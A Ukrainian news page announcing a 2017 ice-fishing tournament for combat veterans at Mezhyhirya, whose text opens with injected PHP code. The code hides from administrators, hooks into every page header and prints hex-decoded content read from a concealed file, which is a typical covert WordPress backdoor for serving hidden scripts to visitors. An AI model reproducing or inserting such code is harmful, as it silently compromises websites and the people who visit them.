if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } 25 лютого у Межигір’ї пройде перший відкритий турнір зі спортивної риболовлі на мормишку серед учасників бойових дій

25 лютого у Межигір’ї пройде перший відкритий турнір зі спортивної риболовлі на мормишку серед учасників бойових дій

25 лютого 2017 року з 08:00 до 16:00 у резиденції Межигір’я (затока Київського моря) пройде перший відкритий турнір зі спортивної риболовлі на мормишку серед учасників бойових дій. Спортивні змагання відбудуться за правилами Федерації риболовного спорту України.

Мета заходу – психологічна реабілітація та повернення до соціуму учасників бойових дій, адаптація в суспільстві, пропаганда здорового способу життя, необхідність фізичного та духовного саморозвитку, залучення до занять фізичною культурою та спортом, підтримка охорони навколишнього середовища.

Близько сотні учасників заходу – люди, серед яких переважна більшість – учасники АТО, ветерани та інваліди війни, які будуть виборювати звання абсолютного чемпіона Турніру. Їх очікують різноманітні призи, нагороди, привітання та майстер-класи від Чемпіонів Світу, а боротьбу за всіма правилами спортивної рибалки забезпечать судді.

У програмі: доставка до місця проведення заходу та назад, урочисте відкриття заходу, парад команд, підняття прапору України, зважування безпосередньо на місцях лову риби, визначення та нагородження переможців, підведення підсумків Турніру.

Організатор: громадська спілка «Братерство учасників бойових дій України».

Захід відбудеться за підтримки Федерації риболовного спорту осіб із інвалідністю «Рисі»; ДСНС Київської області.

Довідково: (067) 801 09 10, (044) 565 15 08 (оргкомітет).

Залишити відповідь

Ваша e-mail адреса не оприлюднюватиметься. Обов’язкові поля позначені *

Статистика сторінки:
Переглядів сьогодні:
Переглядів у поточному місяці:
Відповідальність за зміст коментарів, що залишають відвідувачі, несуть їхні автори.
Популярне